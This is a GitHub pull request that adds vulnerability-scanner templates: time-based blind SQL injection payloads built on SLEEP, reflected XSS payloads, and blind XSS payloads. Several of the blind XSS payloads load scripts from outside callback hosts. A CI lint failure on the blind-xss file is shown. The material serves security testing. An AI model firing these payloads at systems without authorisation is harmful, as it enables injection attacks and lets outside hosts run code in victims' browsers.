Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Updated Reflected XSS, Added Blind XSS and Time based SQLi #9695

Open
wants to merge 8 commits into
base: main
Choose a base branch
from
+113 −3
Open

Updated Reflected XSS, Added Blind XSS and Time based SQLi #9695

Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
8 commits
Select commit Hold shift + click to select a range
193435f
Create time-based-sqli.yaml
0xKayala May 3, 2024
f9ac5ca
Update reflected-xss.yaml
0xKayala May 3, 2024
93236e5
Create blind-xss.yaml
0xKayala May 3, 2024
d3c7465
Merge branch 'projectdiscovery:main' into main
0xKayala May 9, 2024
f20da22
Merge branch 'projectdiscovery:main' into main
0xKayala May 16, 2024
00557e3
Merge branch 'projectdiscovery:main' into main
0xKayala May 18, 2024
f7993e9
lint fix
ritikchaddha Jun 3, 2024
6c4cc54
lint fix
ritikchaddha Jun 5, 2024
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Jump to
Jump to file
Failed to load files.
Diff view
Diff view
36 changes: 36 additions & 0 deletions dast/vulnerabilities/sqli/time-based-sqli.yaml
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,36 @@
id: time-based-sqli

info:
name: Time-Based Blind SQL Injection
author: 0xKayala
severity: critical
description: |
This Template detects time-based Blind SQL Injection vulnerability
tags: sqli,dast,time

http:
- method: GET
path:
- "{{BaseURL}}"

payloads:
injection:
- "(SELECT(0)FROM(SELECT(SLEEP(7)))a)"
- "'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z"
- "' AND (SELECT 4800 FROM (SELECT(SLEEP(7)))HoBG)--"
- "if(now()=sysdate(),SLEEP(7),0)"
- "'XOR(if(now()=sysdate(),SLEEP(7),0))XOR'Z"
- "'XOR(SELECT CASE WHEN(1234=1234) THEN SLEEP(7) ELSE 0 END)XOR'Z"

fuzzing:
- part: query
type: replace
mode: single
fuzz:
- "{{injection}}"

stop-at-first-match: true
matchers:
- type: dsl
dsl:
- "duration>=7 && duration <=16"
64 changes: 64 additions & 0 deletions dast/vulnerabilities/xss/blind-xss.yaml
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,64 @@
id: blind-xss

info:
name: Blind Cross Site Scripting
author: 0xKayala
severity: high
description: This template will spray blind XSS payloads into URLs. Use 'xss.report', 'bxsshunter.com', 'xsshunter.trufflesecurity.com', 'ez.pe' or 'self-hosted server' to check if the payload fired.
tags: xss,bxss,dast

variables:
first: "{{rand_int(10000, 99999)}}"
script_payload_1: "<script>$.getScript(\"//satya.bxss.in\")</script>"
script_payload_2: "</script><script%20/src=//0xkayala.github.io/xss-poc.js></script>\"><41707"
script_payload_3: "<script /src=//0xkayala.github.io/xss-poc.js></script>"
script_payload_4: "<script src=\"//0xkayala.github.io/xss-poc.js\"></script>"
script_payload_5: "</script><script src='https://satya.ez.pe'></script>"
script_payload_6: "<script src=//satya.ez.pe></script>"
script_payload_7: "\u0022\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e"
script_payload_8: "%3Cdiv%20id%3D%22load%22%3E%3C%2Fdiv%3E%3Cscript%3Evar%20i%20%3D%20document.createElement%28%27iframe%27%29%3B%20i.style.display%20%3D%20%27none%27%3B%20i.onload%20%3D%20function%28%29%20%7B%20i.contentWindow.location.href%20%3D%20%27%2F%2F0xkayala.github.io/xss-poc.js%27%3B%20%7D%3B%20document.getElementById%28%27load%27%29.appendChild%28i%29%3B%3C%2Fscript%3E"
script_payload_9: "XX"></SCRIPT><embed src=//14.rs>"

Check failure on line 20 in dast/vulnerabilities/xss/blind-xss.yaml

View workflow job for this annotation

GitHub Actions / build 

20:26 syntax error: expected chomping or indentation indicators, but found '<' (syntax)

http:
- method: GET
path:
- "{{BaseURL}}"

payloads:
blind:
- "{{script_payload_1}}"
- "{{script_payload_2}}"
- "{{script_payload_3}}"
- "{{script_payload_4}}"
- "{{script_payload_5}}"
- "{{script_payload_6}}"
- "{{script_payload_7}}"
- "{{script_payload_8}}"
- "{{script_payload_9}}"

fuzzing:
- part: query
type: postfix
mode: single
fuzz:
- "{{blind}}"

stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "{{script_payload_1}}"
- "{{script_payload_2}}"
- "{{script_payload_3}}"
- "{{script_payload_4}}"
- "{{script_payload_5}}"
- "{{script_payload_6}}"
- "{{script_payload_7}}"
- "{{script_payload_8}}"
- "{{script_payload_9}}"
- type: word
part: header
words:
- "text/html"
16 changes: 13 additions & 3 deletions dast/vulnerabilities/xss/reflected-xss.yaml
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -1,8 +1,8 @@
id: reflected-xss

info:
name: Reflected Cross Site Scripting
author: pdteam
name: Reflected Cross-Site Scripting
author: pdteam,0xKayala
severity: medium
tags: xss,rxss,dast

Expand All @@ -18,6 +18,16 @@ http:
payloads:
reflection:
- "'\"><{{first}}"
- "<img src=x onerror=alert({{first}})>"
- "<script>alert({{first}})</script>"
- "'><ScRiPt>alert({{first}})</sCrIpT>"
- "</script><ScRiPt>alert({{first}})</sCrIpT>"
- "</script><script>alert({{first}})</script>"
- "<body onload=alert({{first}})>"
- "<marquee><img src=x onerror=confirm({{first}})></marquee>"
- "'><img%20src=xxx:x%20\x20onerror=javascript:alert({{first}})>"
- "'\"><img%20s+src+c=x%20on+onerror+%20=alert({{first}})>"
- "'%3e%3cscript%3ealert({{first}}*{{first}})%3c%2fscript%3eejj4sbx5w4o"

fuzzing:
- part: query
Expand All @@ -38,4 +48,4 @@ http:
part: header
words:
- "text/html"
# digest: 4a0a0047304502205a9aa38841e7308e5d1bf21526d6ae14c3ea4b5b00def0f0f0b95501c0df237d022100ca9a3145f00b6278b60ccc0cb44b525a7bfcf2f86ead8664c33c0ce345a623ea:922c64590222798bb761d5b6d8e72950
# digest: 4a0a0047304502205a9aa38841e7308e5d1bf21526d6ae14c3ea4b5b00def0f0f0b95501c0df237d022100ca9a3145f00b6278b60ccc0cb44b525a7bfcf2f86ead8664c33c0ce345a623ea:922c64590222798bb761d5b6d8e72950